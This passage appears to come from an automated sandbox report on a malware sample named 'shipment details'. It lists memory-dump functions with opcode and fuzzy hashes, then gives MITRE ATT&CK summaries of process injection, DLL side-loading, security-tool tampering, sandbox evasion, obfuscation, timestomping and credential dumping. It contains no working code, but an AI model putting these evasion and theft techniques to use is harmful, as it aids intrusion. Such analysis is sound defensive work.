API ID:
String ID:
API String ID:
Opcode ID: 85cab4ab79e4417d435604e6f360365bf68b516018ea4e6466b92f6d69b79792
Instruction ID: c358684f851194683928ec8feececf6e03584708bb612969c330c31349c3b6a2
Opcode Fuzzy Hash: 85cab4ab79e4417d435604e6f360365bf68b516018ea4e6466b92f6d69b79792
Instruction Fuzzy Hash: C2316B7140D7C49FC7038B64C9A4701BF71EB47214F2985EBD9888F2A3C23A980ACB62

Function 012DD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519278354.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12dd000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e863f58e6d3c9c7950a5bfe576c72a76ac996377a1b2bd28978ee375877d14d7
Instruction ID: a93cd657a314d96fadfc351881fa0442db0d98eaf796b2d0a775f72d9c70ccb3
Opcode Fuzzy Hash: e863f58e6d3c9c7950a5bfe576c72a76ac996377a1b2bd28978ee375877d14d7
Instruction Fuzzy Hash: 78213471514608EFCB15CFA8C9C0B26BB65FB84314F20C96DEA490B392C77AD446CA62

Function 01335649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e189201b3282c4251fb5fa8bd675faa38f3003ce828451202104f0ea56659216
Instruction ID: 5de808f01727a4e61349293060536bf827e7c2be353d03f4bdb5c2d4753ff73e
Opcode Fuzzy Hash: e189201b3282c4251fb5fa8bd675faa38f3003ce828451202104f0ea56659216
Instruction Fuzzy Hash: 4B213572605149CFCB12AF68E844BAF7BB1FB84319F008469E905CB385CB35CD15DBA4

Function 01339761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d34b7c73ec5109544f72b7d2098964aa92e125100d0fb5de29102b8cc1f764
Instruction ID: 320e6c0872c1490265070e399fbc7afbe06cb1ad2540f47d06b4c65d6fc6dde5
Opcode Fuzzy Hash: 81d34b7c73ec5109544f72b7d2098964aa92e125100d0fb5de29102b8cc1f764
Instruction Fuzzy Hash: F1216830E05249DFDB05CFB9D550AEEBFB6AF89308F148069E415E6394DB30D941CB20

Function 0133AEF0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e366575556f7fa552d4dda013b2529ea24927c9d59c55677e89f31fb0e4ea0
Instruction ID: 1b84a839506a7277339db2491d77436a8b2a066f42ec59c3d074b190340640c9
Opcode Fuzzy Hash: f0e366575556f7fa552d4dda013b2529ea24927c9d59c55677e89f31fb0e4ea0
Instruction Fuzzy Hash: 44118172B101089BCB149F59DC44BDEBBBAFB8C315F144026E916E7390DB719C14CB94

Function 0133F640 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be35e129e2cef77fdfb5a8f2d425949ffc654b061184588550fc008d5eda71b7
Instruction ID: 942f93671ad444d507699e3eabe195b7b9176bcac615ad1370d78a0b2c70a40a
Opcode Fuzzy Hash: be35e129e2cef77fdfb5a8f2d425949ffc654b061184588550fc008d5eda71b7
Instruction Fuzzy Hash: 3A215BB1D0120A9FDB05EFA9E64469EBFF6FF41304F4085A9C0589B369E7749A09CF81

Function 01336300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4878f8cbbf2bef12469599f175880ead11f63abd8f34f49037a0faeb9cc0b599
Instruction ID: caebdc1e7473ede920db9850f9b19cb9cc949630acd6c112a40fde7057d4d979
Opcode Fuzzy Hash: 4878f8cbbf2bef12469599f175880ead11f63abd8f34f49037a0faeb9cc0b599
Instruction Fuzzy Hash: 79110476704612AFD7199B2AD85893EBBA6FFC57693194478E906CB360CF30DC028B94

Function 013327F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0c227c223d706d0105c53ab9f631ac9507f7229ddbda4490c35252426c75f3
Instruction ID: ef088eee4e87b2b762f51007e975f95880a08a6d8d99a79a3a7d4f45e5fc8f2c
Opcode Fuzzy Hash: 9e0c227c223d706d0105c53ab9f631ac9507f7229ddbda4490c35252426c75f3
Instruction Fuzzy Hash: 0121DD74D1060A8FCB00EFA9D9446EEBBF4FB49301F10562AD849B2310EB345A95CBA1

Function 0133F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde4be1eb8022e8c92ea2b0cc72cabf1168cecd73e7927dbb75c7499a3692a15
Instruction ID: cf8c94f3b20aa2239f7b5fb6e80bd9f09202806290821b1601733d5026ce3624
Opcode Fuzzy Hash: fde4be1eb8022e8c92ea2b0cc72cabf1168cecd73e7927dbb75c7499a3692a15
Instruction Fuzzy Hash: F9116A70D0010A8FDB05EFA9E644A9EBBF6FF40304F00C569C1589B369EB349A09CF81

Function 01335E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab59e69fe8f934d5a8db9fb0279be4d39cd44c194b2e581d4835a739c93e4c1
Instruction ID: 554b8539ba0c9f414a12136fa7e0244c0e40df7dce2d0c928fcc8c91d6702ed2
Opcode Fuzzy Hash: bab59e69fe8f934d5a8db9fb0279be4d39cd44c194b2e581d4835a739c93e4c1
Instruction Fuzzy Hash: DE01D432B001196BDB05AE98DC00BEF3B9AEBC8654F14802AF605D7344DA758C1697A5

Function 0133ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c487ba10caec1c6d0a33f90c87cff8cd5b3a8ccf63b6304d2c8f1ff461be5b
Instruction ID: 2276b0ab3562c68d0fe80d06af55f27fbab414b1b31def2c169d677ad3648cfd
Opcode Fuzzy Hash: 74c487ba10caec1c6d0a33f90c87cff8cd5b3a8ccf63b6304d2c8f1ff461be5b
Instruction Fuzzy Hash: 0FF021313006104BDF155A2ED85462A77DEEFC89593054479E545C7371EF20CC038384

Function 0133E8E8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37a1b6993c115d840bfe5f79973e45c2a34747bdc7b383841a009ff922305af
Instruction ID: 622c573170bf8eebbde4bc4b091729ccb7fd41979233f7587a534b3061528f3e
Opcode Fuzzy Hash: e37a1b6993c115d840bfe5f79973e45c2a34747bdc7b383841a009ff922305af
Instruction Fuzzy Hash: 72014879D0020ADFDF40DFE8E945AAEBBB2FB48304F104125E914A3354D7359A16CF91

Function 0133F5C0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d671d059114c4cc91022cb59b7f84b0b042c62cab04ce248551236809184c5
Instruction ID: cba27ef90240931944a590c63b3d1a2d9a37dee99bd8319b494ba6658874af87
Opcode Fuzzy Hash: 23d671d059114c4cc91022cb59b7f84b0b042c62cab04ce248551236809184c5
Instruction Fuzzy Hash: 40F03A70E11125CFCB94EF7CC40455E7BF8AF4822476144A9D409DB361EB30DD008BD1

Function 013328A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cff49148e0810fe8a49953915bafedeb6365bd40bb815dc5fea7b9d8d3eb6cd
Instruction ID: 56af67dbaad4a68228e504ca144f8a42d503c7665ef032c9f0ed1d1631e83b3f
Opcode Fuzzy Hash: 2cff49148e0810fe8a49953915bafedeb6365bd40bb815dc5fea7b9d8d3eb6cd
Instruction Fuzzy Hash: 4EE08631D1016B86C715DBA0E8045EEF734EFD5364F554676D41876140EB34259AC691

Function 013328B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587299266c8a80326ed3140a1c5b3946798dd4c608871c70a0e27b301c1adab3
Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
Opcode Fuzzy Hash: 587299266c8a80326ed3140a1c5b3946798dd4c608871c70a0e27b301c1adab3
Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1

Function 01336739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f9a8379ef9af7d9af118506bde694f129323ccdb7bf50ae558dfba72338abee
Instruction ID: de678a9b1a41221b1044206a21700faf76e4b6cafe82163fbec4db0ffc76f398
Opcode Fuzzy Hash: 6f9a8379ef9af7d9af118506bde694f129323ccdb7bf50ae558dfba72338abee
Instruction Fuzzy Hash: 7FD05E324983498ED209F734EE06B963B1EEB80618F689524D0064635EEEBC980A8650

Function 0133AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98ba243081ba923f370a278fbc0319d4d958c28441bf237b369fa309399709d
Instruction ID: 5cd8647b8bba4dca66adbcae8429daf42f12c20b6a532b48c034e5151b3e2cce
Opcode Fuzzy Hash: a98ba243081ba923f370a278fbc0319d4d958c28441bf237b369fa309399709d
Instruction Fuzzy Hash: 4CD0673AB40018AFCB049F98EC408DDFB76FB98221B048517E915E3261C6319925DB50

Function 01336748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c9d5d91937abddf78e5f349eea76507a946d6d5200585562d9de209924821a
Instruction ID: f050976f22689375c99113ee858b79edf20b99f9dcdd83f54fd8fa8214a43a0c
Opcode Fuzzy Hash: 19c9d5d91937abddf78e5f349eea76507a946d6d5200585562d9de209924821a
Instruction Fuzzy Hash: 5AC01232454709CEC549FB65FE45955372EAAC06087548A2091060675DEFB89C498694

Non-executed Functions

Function 06BD0040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5uq, xrefs: 06BD015B

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: f513711184b816f6115a0fbb81f264910e148cbe4f1bda9d3b757e899ce5985e
Instruction ID: e110e1e4aec4689a11bba6636cbb17daa0a6b247dc60a11a7f413210e965aba8
Opcode Fuzzy Hash: f513711184b816f6115a0fbb81f264910e148cbe4f1bda9d3b757e899ce5985e
Instruction Fuzzy Hash: CA52AB74E01229CFDB64DF69C884BDDBBB2BB89304F1085E9D409AB265DB359E85CF40

Function 0133F960 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d79a86f84a3d0d9f3a2dd2afc8ad7a779f481b912477e0a8874d2473a7f1e63
Instruction ID: 41ae80bc1655318a0a0a9be4a37fd6ef14b2564415ffc441e3cbd847fa8d5aab
Opcode Fuzzy Hash: 0d79a86f84a3d0d9f3a2dd2afc8ad7a779f481b912477e0a8874d2473a7f1e63
Instruction Fuzzy Hash: 6FC1F174E00218CFDB54DFA9D984B9DBBB6BF88304F1081A9D808AB365DB359E85CF11

Function 06BDE6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0996053ba6f5d16cfede342cf9f52856b43432652aafa5bed1efa5d8bf3240
Instruction ID: ed91662d9da081743b77bb3033d776c35a11e39f83a0ab30a42536cce4663aa6
Opcode Fuzzy Hash: 7a0996053ba6f5d16cfede342cf9f52856b43432652aafa5bed1efa5d8bf3240
Instruction Fuzzy Hash: 7EC1B1B4E00218CFDB54DFA5D984B9DBBB2BF88304F1081A9D409AB365DB359E85CF50

Function 06BDDE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d2d59651bfd30aa9b97a330b23e6bdb8b29bbd4d4db6a4f4a5eb7dd6e5cfc6
Instruction ID: cf4e59a4f845751c2c14f5bc45b8ad1e66587815a144c26794ce74dfc2ec97a9
Opcode Fuzzy Hash: 64d2d59651bfd30aa9b97a330b23e6bdb8b29bbd4d4db6a4f4a5eb7dd6e5cfc6
Instruction Fuzzy Hash: 43C1C0B4E00218CFDB54DFA5D984B9DBBB2BF88304F1081A9D808AB365DB359E85CF50

Function 06BDE258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a7bb17fed5266c61cdd39b1f51bddbe41c3486478188a036f5bcade635fb55f
Instruction ID: c4d291b496d51464befe251d57e262c48e8228cf697f9a830cb62d116bbe6e55
Opcode Fuzzy Hash: 2a7bb17fed5266c61cdd39b1f51bddbe41c3486478188a036f5bcade635fb55f
Instruction Fuzzy Hash: C5C1A0B4E00218CFDB54DFA5D984B9DBBB2BF89304F1081A9D409AB365EB359E85CF50

Function 06BDF3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d96380030d9a896c1d946ccc9a5a1954f917c5d2d7493ca39b71c8f91e10f7
Instruction ID: e3136ff8eb5fd136be2bee5e43feb08e057ff67b23d2749623ce99131fc05914
Opcode Fuzzy Hash: 69d96380030d9a896c1d946ccc9a5a1954f917c5d2d7493ca39b71c8f91e10f7
Instruction Fuzzy Hash: AEC1D174E00218CFDB54DFA5D944BADBBB6BF88304F1081A9D409AB365DB359E85CF50

Function 06BDEB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e349163278f007bfb1e3db9958d7a1653641d8adf54dab4b92465ef5adb144db
Instruction ID: 2aeeda034a90c2e88ad615d15ac68fe3caa3fb289bd7c853a892aa03fd4814e0
Opcode Fuzzy Hash: e349163278f007bfb1e3db9958d7a1653641d8adf54dab4b92465ef5adb144db
Instruction Fuzzy Hash: AAC1B1B4E00218CFDB54DFA5D984B9DBBB2BF89304F1081A9D409AB365DB359E85CF50

Function 06BDEF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbfe1926428cb334f20443857ee022223cf2474c0e566e52b2beebe17892cb5
Instruction ID: d76c2d6cfc09bcef00704f026ee59347e56a0a5b95a8bf4a5e2cec08f36314ce
Opcode Fuzzy Hash: 1cbfe1926428cb334f20443857ee022223cf2474c0e566e52b2beebe17892cb5
Instruction Fuzzy Hash: 35C1C1B4E00218CFDB54DFA5D944BADBBB6BF88304F1081A9D809AB365DB359E85CF50

Function 06BDCCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a224103a53590365162ebbb33f0144aa652eb83bb51527dd0bc202c95194d1b
Instruction ID: c7709099cb2c9cf87e9e9dc5101b4cc9a3d1b4e9c3b7585ca79abaf9cf11e8bc
Opcode Fuzzy Hash: 1a224103a53590365162ebbb33f0144aa652eb83bb51527dd0bc202c95194d1b
Instruction Fuzzy Hash: 06C1C1B4E00218CFDB54DFA5D994B9DBBB6BF88304F1081A9D808AB365DB359E85CF50

Function 06BDD0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97410835dc0113302e48d2da66cd51fdabf6e0ce25ff7a7daaaa33a19b178409
Instruction ID: b0fe8ad45940f8e6a07b0928d4eed135fafda1815d2d8172f5c408a9ad71f184
Opcode Fuzzy Hash: 97410835dc0113302e48d2da66cd51fdabf6e0ce25ff7a7daaaa33a19b178409
Instruction Fuzzy Hash: 8DC1C0B4E00218CFDB54DFA5D984B9DBBB2BF89304F1081A9D409AB365DB359E85CF50

Function 06BDF810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ee78f2df42444beae4df6aceab345f235ec4b2be7c4b6b817e4e21aa2ee02b
Instruction ID: 947004acfbbcb91a668209896cfb8c0630b3b397c6fd1605ad72a458eee76bb7
Opcode Fuzzy Hash: d5ee78f2df42444beae4df6aceab345f235ec4b2be7c4b6b817e4e21aa2ee02b
Instruction Fuzzy Hash: A4C1C174E00218CFDB54DFA5D944BADBBB6BF88304F1081A9D809AB365EB359E85CF50

Function 06BDD9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 921b797a5684c74aefdff96408da3f3ffb451d8b1c101affa83281d6ba38a89e
Instruction ID: 50add370dfb8dcecb129b55286e196976e415d0946c026d0371af999c3979541
Opcode Fuzzy Hash: 921b797a5684c74aefdff96408da3f3ffb451d8b1c101affa83281d6ba38a89e
Instruction Fuzzy Hash: F7C1C1B4E00218CFDB54DFA9D944B9DBBB2BF89304F1081A9D808AB365DB359E85CF50

Function 06BDD550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f61e631d60cf6624596a4c152d1588f32bcc4204d0dfb8016c22bc616cbdbcbe
Instruction ID: 21861b8bd5f20ede505e1df4c8fdeaeafba320356a78b33828375537136f7167
Opcode Fuzzy Hash: f61e631d60cf6624596a4c152d1588f32bcc4204d0dfb8016c22bc616cbdbcbe
Instruction Fuzzy Hash: 2CC1C1B4E00218CFDB54DFA5D994B9DBBB2BF89304F1081A9D408AB365DB359E85CF50

Function 01336920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 01336952
\;]q, xrefs: 01336936
\;]q, xrefs: 0133695E
\;]q, xrefs: 0133692C

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: b3a06b06eb6820c687362e093786a0c0b8384eca1b8716e5e3a75cd1a2a2b82d
Instruction ID: c746f3b699999ef96e37c99a57f9787505e51ded59f29075402fa141a849ec41
Opcode Fuzzy Hash: b3a06b06eb6820c687362e093786a0c0b8384eca1b8716e5e3a75cd1a2a2b82d
Instruction Fuzzy Hash: 2801F2B1740108AFD764CE2CC5819A537EABFC8B68725446AE545CB375DA31DD41C748

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
